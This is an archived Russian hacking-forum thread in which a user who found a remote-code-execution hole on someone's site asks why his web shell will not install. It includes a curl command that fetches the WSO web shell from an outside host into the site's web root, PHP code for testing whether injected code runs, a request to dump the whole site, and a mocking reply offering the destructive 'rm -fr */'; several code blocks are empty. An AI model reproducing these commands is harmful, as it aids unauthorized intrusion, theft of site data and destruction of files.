PDA

Просмотр полной версии : Загрузка Shell через RCE

Sensoft
28.01.2018, 05:15
Через нетспаркер нашёл дыру RCE

через команду


Code:


дыра в регистрации

site.ru/register/jeks.php

site.ru/jeks.php

shell так и не залился искал по адресам которые выше

в чём проблема ?
Sensoft
28.01.2018, 05:21
curl -s -k http://txt.731my.com/wso.txt >> /var/www/название сайта/data/www/название сайта.com/wso.php & echo done

тоже не катит
cat1vo
28.01.2018, 05:29
[PHP]
PHP:
[COLOR="#0000BB"][COLOR="#007700"]
Sensoft
28.01.2018, 05:32
[QUOTE="cat1vo"]
cat1vo said:
↑ (https://antichat.live/posts/4178215/)
[PHP]
PHP:
[COLOR="#0000BB"][COLOR="#007700"]
aka PSIH
28.01.2018, 07:37
то исполняется? Папка с правами для записи есть?

как вариант
pas9x
28.01.2018, 08:24
ТС, ты хоть пхп для начала выучи, чтоли. Ты уже второй месяц чего-то там взламываешь. За это время можно-бы было выучить язык и больше никогда не создавать нубских топиков.

По сабжу.


Sensoft said:
↑ (https://antichat.live/posts/4178211/)
нашёл дыру RCE


Для начала надо убедиться что пхп-код вообще выполняется на сервере. Если это RCE то запусти такой код:


PHP:
$url='http://site.ru/file.txt';
$banned=ini_get('disable_functions');
if (function_exists('curl_init') && !is_int(strpos($banned,'curl_'))) {
$ch=curl_init($url);
curl_exec($ch);
} else {
file_get_contents($url);
}

Ну или то-же самое под eval+base64. Затем идёшь в админку хостинга site.ru и смотришь в логе веб-сервера заходил-ли кто на /file.txt. Если в логе есть запись с этим uri - значит код на сервере запускается. Ели нет - либо функции заблокированы в disable_functions, либо вообще RCE не работает, что скорее всего.
Sensoft
28.01.2018, 14:52
aka PSIH said:
↑ (https://antichat.live/posts/4178225/)
то исполняется? Папка с правами для записи есть?
как вариант


Вчера шуршал, папку с правами так и не увидел

теперь понятно почему я не мог загрузить shell
Sensoft
28.01.2018, 14:56
Просматривать файлы я могу

Есть команда для того чтобы сдампить весь сайт ?
pas9x
28.01.2018, 21:01
Sensoft said:
↑ (https://antichat.live/posts/4178322/)
Есть команда для того чтобы сдампить весь сайт ?




PHP:
Sensoft
29.01.2018, 03:08
pas9x said:
↑ (https://antichat.live/posts/4178481/)

PHP:




не катит
BabaDook
29.01.2018, 08:45
Sensoft said:
↑ (https://antichat.live/posts/4178322/)
Просматривать файлы я могу
Есть команда для того чтобы сдампить весь сайт ?


rm -fr */